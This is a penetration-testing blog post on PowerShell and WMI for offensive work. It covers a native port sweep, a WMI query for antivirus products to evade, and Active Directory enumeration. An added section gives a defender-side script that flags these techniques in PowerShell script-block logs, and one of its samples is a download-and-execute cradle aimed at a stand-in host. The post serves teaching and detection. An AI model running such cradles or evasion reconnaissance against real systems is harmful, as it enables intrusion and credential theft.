
War Room

Shells from above


WMI & PowerShell for Offensive Security

January 24, 2022 By Kevin Randall

As a penetration tester, learning how to use a CLI (Command Line Interface) is a necessary skill, as there are many times when an interactive interface such as Remote Desktop won’t be available. Starting with the standard Windows command prompt (cmd.exe) is a good first step. However, there are more advanced and feature-rich CLI interfaces. Two of these are WMI (Windows Management Instrumentation) and PowerShell.

PowerShell is a command line interface and .NET scripting language that has been around since Windows 2003 as an optional add-on rather than part of the standard installation. PowerShell is useful for many system administrators performing day-to-day tasks, and these same features can be used for Offensive Security as well. To access PowerShell, click on the Windows Start icon, type “powershell.exe” and you will see the following.

Go ahead and click on it.

Afterwards, you will see a blue prompt like the following:

The same commands from “cmd.exe” apply but there are other nice features for those who are more familiar with Linux. An example of this is the ability to use the “ls” command. “ls” works in PowerShell but not Command Prompt as shown below:

Command Prompt “ls”
PowerShell “ls”

PowerShell uses what are called cmdlets. Cmdlets are, in summary, commands that you can run to perform automated tasks. Example cmdlets include Get-NetAdapter, Get-Process, Get-ADUser and others. Cmdlet names follow a (Verb-Action) format. Cmdlets can be used to write PowerShell scripts (.ps1 files) or run from the PowerShell CLI, similar to what you would use from a command prompt. If you want to find out how to use a particular PowerShell cmdlet, you can put Get-Help before any cmdlet, as seen below:

Using PowerShell for Offensive Security is where things get very interesting. There are many times during a penetration test where you cannot install tools on client systems, and you need to use only the features already available on the compromised system. This concept is called “Living off the land”, which, in summary, means working with the cards you’re dealt. Many penetration testers would use Nmap for conducting a port scan, but you can also do the same thing with native PowerShell. You can run the following to perform a port scan using PowerShell:

foreach ($ip in 1..2) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.0.$ip}

You can also use WMI from PowerShell via the Get-WmiObject cmdlet. Get-WmiObject is the PowerShell cmdlet for querying WMI.

During the post-exploitation process, you may need to identify the Anti-Virus product or EDR (Endpoint Detection and Response) software that you may need to evade when conducting your post-exploitation activities. You can use WMI to identify the Anti-Virus product installed on the client system with a command like the following example:

Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct | Select-Object displayName

Another common and very useful way to use PowerShell for Offensive Security is Invoke-Expression (IEX). IEX is an alias for the Invoke-Expression cmdlet within PowerShell. You can use Invoke-Expression to download arbitrary scripts from sites such as GitHub or other locations and run them on the compromised host. The following is an example of using IEX to run a PowerShell script called SessionGopher to gather sensitive information on the compromised machine:

PowerShell is also very useful when it comes to enumerating Active Directory. Common cmdlets such as Get-ADUser can be used to find out information about a particular user account on an Active Directory domain. Commands such as the following example are useful for gathering this information:

Get-ADUser -Identity (USERID)
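Every technique above (the Test-NetConnection sweep, the SecurityCenter2 query, the IEX download cradle and Get-ADUser enumeration) leaves its full command text in PowerShell Script Block Logging (event ID 4104 in Microsoft-Windows-PowerShell/Operational) when that logging is enabled. The script below is an added defender-side example, not code from the original post: it defines simple regex rules for those four patterns, runs them over constructed sample script blocks so it works offline, and includes a helper that feeds real 4104 events through the same rules. The rule names, the sample strings and the example.invalid URL are all constructed.

```powershell
# Added example (not from the original post): match Script Block Logging text against
# rules for the techniques described above. Rule names and samples are constructed.
$Rules = @(
    @{ Name = 'IEX download cradle';    All = @('Invoke-Expression|\bIEX\b', 'DownloadString|WebClient|Invoke-WebRequest|\biwr\b') }
    @{ Name = 'Security product query'; All = @('SecurityCenter2|AntiVirusProduct') }
    @{ Name = 'Port sweep';             All = @('Test-NetConnection', '-Port') }
    @{ Name = 'AD user enumeration';    All = @('Get-ADUser') }
)

function Test-ScriptBlockText {
    # Returns the name of every rule whose regexes ALL match the text (-match is case-insensitive).
    param([Parameter(Mandatory)][string]$Text)
    foreach ($rule in $Rules) {
        $hits = @($rule.All | Where-Object { $Text -match $_ })
        if ($hits.Count -eq $rule.All.Count) { $rule.Name }
    }
}

function Get-SuspiciousScriptBlocks {
    # Reads real 4104 events; requires Script Block Logging to be enabled on the host.
    # For event 4104, Properties[2] holds the ScriptBlockText field.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value
            $matched = @(Test-ScriptBlockText -Text $text)
            if ($matched.Count -gt 0) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Rules   = ($matched -join ', ')
                    Snippet = $text.Substring(0, [Math]::Min(80, $text.Length))
                }
            }
        }
}

# Constructed sample script blocks standing in for logged event text, so the rules can be checked offline.
$Samples = @(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/SessionGopher.ps1')",
    "Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct | Select-Object displayName",
    'foreach ($ip in 1..2) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.0.$ip}',
    'Get-ADUser -Identity jdoe',
    'Get-Process | Sort-Object CPU -Descending | Select-Object -First 5'   # benign admin activity, should not match
)
foreach ($s in $Samples) {
    $matched = @(Test-ScriptBlockText -Text $s)
    $label = if ($matched.Count -gt 0) { $matched -join ', ' } else { '(no match)' }
    '{0,-24} {1}' -f $label, $s
}
```

Run Get-SuspiciousScriptBlocks on a host with Script Block Logging enabled to apply the same rules to live events; the rules are deliberately coarse and will need tuning against your environment's normal administrative activity.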

These are just some common examples of using PowerShell for Offensive Security and there is a wealth of information that covers this more in depth.


